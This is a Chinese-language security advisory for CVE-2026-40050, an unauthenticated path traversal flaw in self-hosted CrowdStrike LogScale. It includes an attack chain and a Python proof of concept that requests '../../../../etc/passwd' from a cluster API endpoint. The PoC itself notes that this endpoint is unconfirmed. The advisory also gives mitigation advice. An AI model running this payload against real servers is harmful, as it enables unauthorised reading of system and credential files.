CVE-2026-40050 CVSS 9.8 严重

CVE-2026-40050 CrowdStrike LogScale路径遍历漏洞

披露日期: 2026-04-21

来源: 13ddcd98-6f4a-40a8-8e24-29ca0aee4661

漏洞信息

漏洞编号

CVE-2026-40050

漏洞类型

路径遍历

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CrowdStrike LogScale

漏洞概述

CrowdStrike LogScale中存在严重的未经身份验证的路径遍历漏洞。该漏洞源于特定的集群API端点缺乏安全验证，允许远程攻击者在无需认证的情况下读取服务器文件系统上的任意文件。此问题仅影响自托管版本的LogScale，SaaS用户不受影响。

技术细节

该漏洞发生在LogScale的特定集群API端点中。由于该端点在处理用户请求时未对路径参数进行严格的校验和标准化处理，导致攻击者可以通过构造包含特殊字符（如../）的请求路径，跨越目录限制。攻击者无需经过身份验证（PR:N）即可利用此漏洞，通过发送恶意HTTP请求访问服务器操作系统上的敏感文件。该漏洞攻击复杂度低且无需用户交互，极易被利用，导致高机密性影响（C:H），可能造成源代码泄露、配置信息窃取等严重后果。

攻击链分析

STEP 1

侦察

攻击者识别互联网上暴露的CrowdStrike LogScale自托管实例。

STEP 2

漏洞探测

向特定的集群API端点发送特制的HTTP请求，其中包含路径遍历序列（如../），以测试服务器是否正确过滤。

STEP 3

利用

由于无需认证，攻击者利用该漏洞读取服务器上的敏感文件（如/etc/passwd、配置文件或日志文件）。

STEP 4

数据窃取

攻击者分析获取的文件内容，寻找凭证、密钥或其他敏感信息，为进一步的横向移动或攻击做准备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_url):
    """
    PoC for CVE-2026-40050: Unauthenticated Path Traversal in CrowdStrike LogScale
    This script attempts to read /etc/passwd from the target server.
    """
    # The specific cluster API endpoint vulnerable to path traversal
    # Note: The exact endpoint path needs to be confirmed based on the version
    vulnerable_endpoint = "/api/v1/cluster/export"  
    
    # Path traversal payload to read /etc/passwd
    payload = "../../../../etc/passwd"
    
    full_url = f"{target_url}{vulnerable_endpoint}?file={payload}"
    
    headers = {
        "User-Agent": "CVE-2026-40050-Scanner"
    }

    try:
        print(f"[+] Sending request to: {full_url}")
        response = requests.get(full_url, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Exploit successful! Server response:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(f"[-] Response body: {response.text[:200]}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost:8080" # Replace with actual target
    exploit_poc(target)

影响范围

CrowdStrike LogScale (Self-hosted) 特定版本

防御指南

临时缓解措施

对于无法立即升级的自托管客户，建议通过网络访问控制列表（ACL）限制对特定集群API端点的访问，仅允许受信任的内部IP地址连接。同时，部署Web应用防火墙（WAF）规则，拦截包含典型路径遍历特征（如 '../' 或其URL编码形式）的恶意请求，以降低被攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表